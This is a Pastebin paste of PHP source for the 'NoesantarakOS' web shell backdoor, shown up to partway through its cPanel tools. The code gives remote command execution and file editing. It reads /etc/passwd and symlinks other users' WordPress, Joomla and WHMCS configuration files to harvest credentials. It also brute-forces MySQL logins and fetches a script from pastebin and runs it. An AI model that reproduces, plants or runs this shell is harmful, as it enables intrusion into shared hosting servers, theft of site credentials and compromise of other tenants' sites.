AmateurS666h05t

NoesantarakOS Shell Backdoor

Aug 13th, 2017
1,279
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 88.45 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html lang="en" class="no-js">
  3. <HEAD>
  4. <title>-:- AmateurS666h05t Shell -:-</title>
  5. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
  6. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
  7. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
  8. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/-yKAYJuGA9dc/V1BXHLL2SaI/AAAAAAAAABY/fKEVg9XGZr0D2uiqmp2LCBHe65gSDHMMACCo/s512/icon-sc0.jpg" type="image/x-icon">
  9. <meta name='author' content='NoesantarakOS Family'>
  10. <meta charset="UTF-8">
  11. <style type="text/css">
  12. body {
  13. background: #000000;
  14. color: springgreen;
  15. font-family :Homenaje;
  16. }
  17.  
  18. #content .first{
  19. background-color: black;
  20. }
  21.  
  22. a{
  23. color: white;
  24. text-decoration: none;
  25. }
  26.  
  27. input,select,textarea{
  28. border: 1px #000000 solid;
  29. -moz-border-radius: 5px;
  30. -webkit-border-radius:5px;
  31. border-radius:5px;
  32. }
  33.  
  34. #menu{
  35. background:#000000;
  36. margin:8px 2px 4px 2px;
  37. font-family:Fredericka the Great;
  38. font-size:14px;
  39. color:silver;
  40. }
  41. #menu a{
  42. padding:3px 6px;
  43. margin:1;
  44. background:#2d2b2b;
  45. text-decoration:none;
  46. letter-spacing:2px;
  47. -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  48. }
  49. #menu a:hover{
  50. background:black;
  51. border-bottom:1px solid #ffffff;
  52. border-top:1px solid #ffffff;
  53. }
  54. .tombolupil{
  55. background:black;
  56. color:white;
  57. margin:0 10px;
  58. font-family:Homenaje;
  59. font-size:16px;
  60. border:2px solid crimson;
  61. }
  62. .tombolupil:hover{
  63. background:crimson;
  64. color:white;
  65. margin:0 10px;
  66. font-family:Homenaje;
  67. font-size:16px;
  68. border:2px solid crimson;
  69. }
  70. .bordergaya{
  71. background:black;
  72. color:white;
  73. margin:0 10px;
  74. font-family:Homenaje;
  75. font-size:16px;
  76. border:2px solid #2d2b2b;
  77. }
  78. .bordergaya:hover{
  79. background:#2d2b2b;
  80. color:white;
  81. margin:0 10px;
  82. font-family:Homenaje;
  83. font-size:16px;
  84. border:2px solid crimson;
  85. }
  86.  
  87. .justborder{
  88. background:black;
  89. color:white;
  90. margin:0 10px;
  91. font-family:Homenaje;
  92. font-size:16px;
  93. border:2px solid #2d2b2b;
  94. }
  95. </style>
  96. </HEAD>
  97. <BODY>
  98. <center>
  99. <?php
  100.  
  101. /*
  102. NoesantarakOS 2kl7 Backdoor
  103. By AmateurS666h05t
  104. */
  105.  
  106. /*
  107. Terimakasih Untuk Orang - Orang Yang Sudah Membantu Sehingga Terciptanya Web Shell Ini
  108. Jujur Saja kami hanya memanfaatkan function dan tools yang di ambil dari shell yang sudah ada Sebelumnya. Jadi Shell Ini Tidak 100% Hasil Codingan AmateurS666h05t
  109. Untuk AnonGhost, Gantengers Crew, Virusa Worm, S1r_V1ru5, Shor7cut, k2ll3d, IndoXploit, Sinkaroid, Ferupuk, 3xp1r3 Cyber Army, Stupidc0de & Yang Lainnya Yang Tidak Bisa Saya Sebutkan Satu-Persatu Saya Ucapkan "ThankYou Verry Much" Atas Toolsnya. Saya Ucapkan Sekali Lagi Terimakasih.
  110.  
  111. Jika Ada Yang Kurang Berkenan dihati silahkan kontak saya di :
  112. - Email : nandarrh51@gmail.com
  113. - https://www.facebook.com/NdarCoolz
  114. */
  115.  
  116. set_time_limit(0);
  117. error_reporting(0);
  118. if(get_magic_quotes_gpc()){
  119. foreach($_POST as $key=>$value){
  120. $_POST[$key] = stripslashes($value);
  121. }
  122. }
  123.  
  124. /* info server */
  125.  
  126. $self=$_SERVER['PHP_SELF'];
  127. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  128. $your_ip=$_SERVER['REMOTE_ADDR'];
  129. $srvr_ip=$_SERVER['SERVER_ADDR'];
  130. $admin=$_SERVER['SERVER_ADMIN'];
  131.  
  132.  
  133. //////all functions disini tempatnya/////
  134. function exe($cmd) {
  135. if(function_exists('system')) {
  136. @ob_start();
  137. @system($cmd);
  138. $buff = @ob_get_contents();
  139. @ob_end_clean();
  140. return $buff;
  141. } elseif(function_exists('exec')) {
  142. @exec($cmd,$results);
  143. $buff = "";
  144. foreach($results as $result) {
  145. $buff .= $result;
  146. } return $buff;
  147. } elseif(function_exists('passthru')) {
  148. @ob_start();
  149. @passthru($cmd);
  150. $buff = @ob_get_contents();
  151. @ob_end_clean();
  152. return $buff;
  153. } elseif(function_exists('shell_exec')) {
  154. $buff = @shell_exec($cmd);
  155. return $buff;
  156. }
  157. }
  158.  
  159. function perms($file){
  160. $perms = fileperms($file);
  161.  
  162.  
  163. if (($perms & 0xC000) == 0xC000) {
  164. // Socket
  165. $info = 's';
  166. } elseif (($perms & 0xA000) == 0xA000) {
  167. // Symbolic Link
  168. $info = 'l';
  169. } elseif (($perms & 0x8000) == 0x8000) {
  170. // Regular
  171. $info = '-';
  172. } elseif (($perms & 0x6000) == 0x6000) {
  173. // Block special
  174. $info = 'b';
  175. } elseif (($perms & 0x4000) == 0x4000) {
  176. // Directory
  177. $info = 'd';
  178. } elseif (($perms & 0x2000) == 0x2000) {
  179. // Character special
  180. $info = 'c';
  181. } elseif (($perms & 0x1000) == 0x1000) {
  182. // FIFO pipe
  183. $info = 'p';
  184. } else {
  185. // Unknown
  186. $info = 'u';
  187. }
  188.  
  189. // Owner
  190. $info .= (($perms & 0x0100) ? 'r' : '-');
  191. $info .= (($perms & 0x0080) ? 'w' : '-');
  192. $info .= (($perms & 0x0040) ?
  193. (($perms & 0x0800) ? 's' : 'x' ) :
  194. (($perms & 0x0800) ? 'S' : '-'));
  195.  
  196. // Group
  197. $info .= (($perms & 0x0020) ? 'r' : '-');
  198. $info .= (($perms & 0x0010) ? 'w' : '-');
  199. $info .= (($perms & 0x0008) ?
  200. (($perms & 0x0400) ? 's' : 'x' ) :
  201. (($perms & 0x0400) ? 'S' : '-'));
  202.  
  203. // World
  204. $info .= (($perms & 0x0004) ? 'r' : '-');
  205. $info .= (($perms & 0x0002) ? 'w' : '-');
  206. $info .= (($perms & 0x0001) ?
  207. (($perms & 0x0200) ? 't' : 'x' ) :
  208. (($perms & 0x0200) ? 'T' : '-'));
  209.  
  210. return $info;
  211. }
  212.  
  213. function getfile($urlfile, $content) {
  214. $fp = fopen($content, "w");
  215. $ch = curl_init();
  216. curl_setopt($ch, CURLOPT_URL, $urlfile);
  217. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  218. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  219. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  220. curl_setopt($ch, CURLOPT_FILE, $fp);
  221. return curl_exec($ch);
  222. curl_close($ch);
  223. fclose($fp);
  224. ob_flush();
  225. flush();
  226. }
  227. //////////////END Functions Biar Rapih////////////////////
  228.  
  229. ///////////////////ZONE-H////////////////
  230. $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== ";
  231.  
  232.  
  233. /*STYLE UPIL BRO BIAR KEKINIAN*/
  234.  
  235. echo '<style>
  236. .js .inputfile {
  237. width: 0.1px;
  238. height: 0.1px;
  239. opacity: 0;
  240. overflow: hidden;
  241. position: absolute;
  242. z-index: -1;
  243. }
  244.  
  245. .inputfile + label {
  246. max-width: 80%;
  247. font-size: 1.25rem;
  248. /* 20px */
  249. font-weight: 700;
  250. text-overflow: ellipsis;
  251. white-space: nowrap;
  252. cursor: pointer;
  253. display: inline-block;
  254. overflow: hidden;
  255. padding: 0.625rem 1.25rem;
  256. /* 10px 20px */
  257. }
  258.  
  259. .no-js .inputfile + label {
  260. display: none;
  261. }
  262.  
  263. .inputfile:focus + label,
  264. .inputfile.has-focus + label {
  265. outline: 1px dotted #000;
  266. outline: -webkit-focus-ring-color auto 5px;
  267. }
  268.  
  269. .inputfile + label * {
  270. /* pointer-events: none; */
  271. /* in case of FastClick lib use */
  272. }
  273.  
  274. .inputfile + label svg {
  275. width: 1em;
  276. height: 1em;
  277. vertical-align: middle;
  278. fill: currentColor;
  279. margin-top: -0.25em;
  280. /* 4px */
  281. margin-right: 0.25em;
  282. /* 4px */
  283. }
  284.  
  285. /* style 4 */
  286.  
  287. .inputfile-4 + label {
  288. color: white;
  289. font-family:Homenaje;
  290. font-size:15px;
  291. }
  292.  
  293. .inputfile-4:focus + label,
  294. .inputfile-4.has-focus + label,
  295. .inputfile-4 + label:hover {
  296. color: crimson;
  297. }
  298.  
  299. .inputfile-4 + label figure {
  300. width: 50px;
  301. height: 50px;
  302. border-radius: 25%;
  303. background-color: crimson;
  304. display: block;
  305. padding: 10px;
  306. margin: 0 auto 10px;
  307. }
  308.  
  309. .inputfile-4:focus + label figure,
  310. .inputfile-4.has-focus + label figure,
  311. .inputfile-4 + label:hover figure {
  312. background-color: white;
  313. }
  314.  
  315. .inputfile-4 + label svg {
  316. width: 100%;
  317. height: 100%;
  318. fill: black;
  319. }
  320.  
  321. .rapihbanget{
  322. text-align: left;
  323. font-size: 16px;
  324. color: springgreen;
  325. font-family: Homenaje;
  326. margin-left: 38%;
  327. }
  328. .kecew{
  329. text-align: left;
  330. font-size: 15px;
  331. color: white;
  332. font-family: Homenaje;
  333. }
  334. </style>
  335. <script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>
  336. ';
  337.  
  338. echo"<br/>
  339. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
  340. *-~'`^'*u_ _u*'^`'~-*,
  341. p!^ / jPw w9j \ ^!p
  342. w^.._ / '\_ _/' \ _.^w
  343. *_ / \_ _ _ _/ \ _*
  344. q / / \q ( `---` ) p/ \ \ p
  345. jj5****._ / ^\_) o o (_/^ \ _.****6jj
  346. *_ / '==) ;; (==' \ _*
  347. `/.w***, /( )\ ,***w.\'
  348. ^ ^c/ ) ( \c^ ^
  349. 'V')_)(_('V'</pre>";
  350. echo "<center><br><font color='Crimson' size='6px' face='Fredericka the Great'>&hearts; NoesantarakOS Family Backdoor &hearts;</font></center>";
  351. echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By AmateurS666h05t [+]</font></center><br/>";
  352.  
  353. /** info kernel */
  354. echo"
  355. <font size='4' color='Teal' face='Jolly Lodger'>
  356. <center>".php_uname()."<br>
  357. ".$software = getenv("SERVER_SOFTWARE");
  358. echo"<p>";
  359.  
  360. echo"
  361. <font size='3.5' color='white'><p>
  362. Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
  363.  
  364. </font>
  365. </font>
  366. </div>
  367. </td>
  368. </tr>
  369. </tbody>
  370. </table></div>
  371. </font>";
  372.  
  373. $disablefunctions = @ini_get("disable_functions");
  374. $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled For This Server! ~_^</font>";
  375. echo '<br/><font size="4" style="font-family:Jolly Lodger; color:teal;">
  376. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
  377.  
  378.  
  379. echo '<br/><font size="4" style="font-family:Jolly Lodger;">
  380. <tr><td> Your Path Location :';
  381.  
  382. //////////////////////
  383. //CWD MULAI DISINI//
  384. ////////////////////
  385.  
  386. if(isset($_GET['path'])){
  387. $path = $_GET['path'];
  388. }else{
  389. $path = getcwd();
  390. }
  391. $path = str_replace('\\','/',$path);
  392. $paths = explode('/',$path);
  393.  
  394. foreach($paths as $id=>$pat){
  395. if($pat == '' && $id == 0){
  396. $a = true;
  397. echo '<a href="?path=/">/</a>';
  398. continue;
  399. }
  400. if($pat == '') continue;
  401. echo '<a href="?path=';
  402. for($i=0;$i<=$id;$i++){
  403. echo "$paths[$i]";
  404. if($i != $id) echo "/";
  405. }
  406. echo '">'.$pat.'</a>/';
  407. }
  408. echo '</font>';
  409.  
  410. ?>
  411.  
  412. <!- menu utama ->
  413. <br><center><div id="menu">
  414. [<a href="?">Home</a>] <font color=orange>=</font>
  415. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
  416. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
  417. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
  418. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
  419. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
  420. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
  421. <br><br>
  422. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
  423. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
  424. <!--[<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Web Killer</a>] <font color=orange>-</font>-->
  425. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
  426. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
  427. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper tool</a>] <font color=orange>=</font>
  428. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
  429. </div></center>
  430. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
  431.  
  432. <?php
  433.  
  434. /*
  435. Lihat File
  436. Dimulai Dari Sini
  437. */
  438. if(isset($_GET['filesrc'])){
  439. echo "<br /><tr><td>You Are Looking : ";
  440. echo $_GET['filesrc'];
  441. echo '</tr></td></table>';
  442. echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  443. break;
  444. }
  445.  
  446.  
  447. /*
  448. permission
  449. Dimulai Dari Sini
  450. */
  451.  
  452. elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  453. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  454. if($_POST['opt'] == 'chmod'){
  455. if(isset($_POST['perm'])){
  456. if(chmod($_POST['path'],$_POST['perm'])){
  457. echo '<script>alert("Change Permission Sukses!");</script>';
  458. }else{
  459. echo '<script>alert("Change Permission Gagal!");</script>';
  460. }
  461. }
  462. echo '<form method="POST">
  463. Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  464. <input type="hidden" name="path" value="'.$_POST['path'].'">
  465. <input type="hidden" name="opt" value="chmod">
  466. <input class="bordergaya" type="submit" value="Go" />
  467. </form>';
  468. }elseif($_POST['opt'] == 'rename'){
  469. if(isset($_POST['newname'])){
  470. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  471. echo '<script>alert("Change Name Sukses!");</script>';
  472. }else{
  473. echo '<script>alert("Change Name Gagal!");</script>';
  474. }
  475. $_POST['name'] = $_POST['newname'];
  476. }
  477. echo '<form method="POST">
  478. New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  479. <input type="hidden" name="path" value="'.$_POST['path'].'">
  480. <input type="hidden" name="opt" value="rename">
  481. <input class="bordergaya" type="submit" value="Go" />
  482. </form>';
  483. }elseif($_POST['opt'] == 'edit'){
  484. if(isset($_POST['src'])){
  485. $fp = fopen($_POST['path'],'w');
  486. if(fwrite($fp,$_POST['src'])){
  487. echo '<script>alert("Edit File Sukses!");</script>';
  488. }else{
  489. echo '<script>alert("Edit File Gagal!");</script>';
  490. }
  491. fclose($fp);
  492. }
  493. echo '<form method="POST">
  494. <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  495. <input type="hidden" name="path" value="'.$_POST['path'].'">
  496. <input type="hidden" name="opt" value="edit">
  497. <input class="bordergaya" type="submit" value="Go" />
  498. </form>';
  499. }
  500. echo '</center>';
  501. break;
  502. }
  503.  
  504.  
  505. /*
  506. Config Grabber
  507. Dimulai Dari Sini
  508. */
  509.  
  510. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
  511.  
  512. echo "
  513. <form method='POST'>
  514. </head>
  515. <style>
  516. textarea {
  517. resize:none;
  518. color: #000000 ;
  519. background-color:#000000;
  520. font-size:8pt; color:#ffffff;
  521. border:1px solid white ;
  522. border-left: 4px solid white ;
  523. width:543px;
  524. height:400px;
  525. }
  526. input {
  527. color: #000000;
  528. border:1px dotted white;
  529. }
  530. </style>";
  531. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Stupidc0de-Conf', 0755);@chdir('Stupidc0de-Conf');
  532. $htaccess="
  533. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  534. Options Indexes FollowSymLinks
  535. ForceType text/plain
  536. AddType text/plain .php
  537. AddType text/plain .html
  538. AddType text/html .shtml
  539. AddType txt .php
  540. AddHandler server-parsed .php
  541. AddHandler txt .php
  542. AddHandler txt .html
  543. AddHandler txt .shtml
  544. Options All
  545. Options All";
  546. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
  547. $passwd=explode("\n",$passwd);
  548. echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
  549. foreach($passwd as $pwd){
  550. $pawd=explode(":",$pwd);$user =$pawd[0];
  551. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
  552. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
  553. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
  554. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
  555. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
  556. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
  557. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
  558. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
  559. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
  560. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
  561. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
  562. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
  563. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
  564. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
  565. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
  566. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
  567. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
  568. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
  569. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
  570. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
  571. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
  572. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
  573. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
  574. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
  575. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
  576. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
  577. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
  578. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
  579. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
  580. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
  581. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
  582. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
  583. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
  584. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
  585. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
  586. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
  587. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
  588. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
  589. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
  590. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
  591. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';}
  592. break;
  593. }
  594. /////// Cukup Sampai Disini ya Grabber :( ////////
  595.  
  596. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  597. ///////////////////////////////////////////////START OF ALL CPANEL TOOLS/////////////////////////////////////////////////////////////////////
  598. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  599.  
  600.  
  601. /// start cpanel brute
  602. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  603. {
  604. ?>
  605. <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
  606. <?php
  607.  
  608. @set_time_limit(0);
  609. @error_reporting(0);
  610.  
  611.  
  612. if($_POST['page']=='find')
  613. {
  614. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  615. {
  616. if($_POST['type'] == 'passwd'){
  617. $e = explode("\n",$_POST['usernames']);
  618. foreach($e as $value){
  619. $k = explode(":",$value);
  620. $username .= $k['0']." ";
  621. }
  622. }elseif($_POST['type'] == 'simple'){
  623. $username = str_replace("\n",' ',$_POST['usernames']);
  624. }
  625. $a1 = explode(" ",$username);
  626. $a2 = explode("\n",$_POST['passwords']);
  627. $id2 = count($a2);
  628. $ok = 0;
  629. foreach($a1 as $user )
  630. {
  631. if($user !== '')
  632. {
  633. $user=trim($user);
  634. for($i=0;$i<=$id2;$i++)
  635. {
  636. $pass = trim($a2[$i]);
  637. if(@mysql_connect('localhost',$user,$pass))
  638. {
  639. echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
  640. $ok++;
  641. }
  642. }
  643. }
  644. }
  645. echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>";
  646. echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
  647. exit;
  648. }
  649. }
  650. if($_POST['pass']=='password'){
  651. @error_reporting(0);
  652. $i = getenv('REMOTE_ADDR');
  653. $d = date('D, M jS, Y H:i',time());
  654. $h = $_SERVER['HTTP_HOST'];
  655. $dir=$_SERVER['PHP_SELF'];
  656. mkdir('config',0755);
  657. $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
  658. $file = fopen("cp.py","w+");
  659. $write = fwrite ($file ,$cp);
  660. fclose($file);
  661. chmod("cp.py",0755);
  662. $url = $_POST['url'];
  663. echo"<center>
  664. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  665. system("python cp.py $url config");
  666. unlink ('cp.py');
  667. echo"</textarea>
  668. </center>";
  669. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
  670. exit;
  671. }
  672. if($_POST['mendapatkan']=='passwd'){
  673. @set_magic_quotes_runtime(0);
  674. ob_start();
  675. error_reporting(0);
  676. @set_time_limit(0);
  677. @ini_set('max_execution_time',0);
  678. @ini_set('output_buffering',0);
  679. $fn = $_POST['foldername'];
  680. //all function here
  681.  
  682. function syml($usern,$pdomain)
  683. {
  684. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  685. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  686. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  687. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  688. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  689. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  690. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  691. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  692. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  693. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  694. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  695. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  696. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  697. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  698. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  699. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  700. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  701. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  702. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  703. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  704. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  705. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  706. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
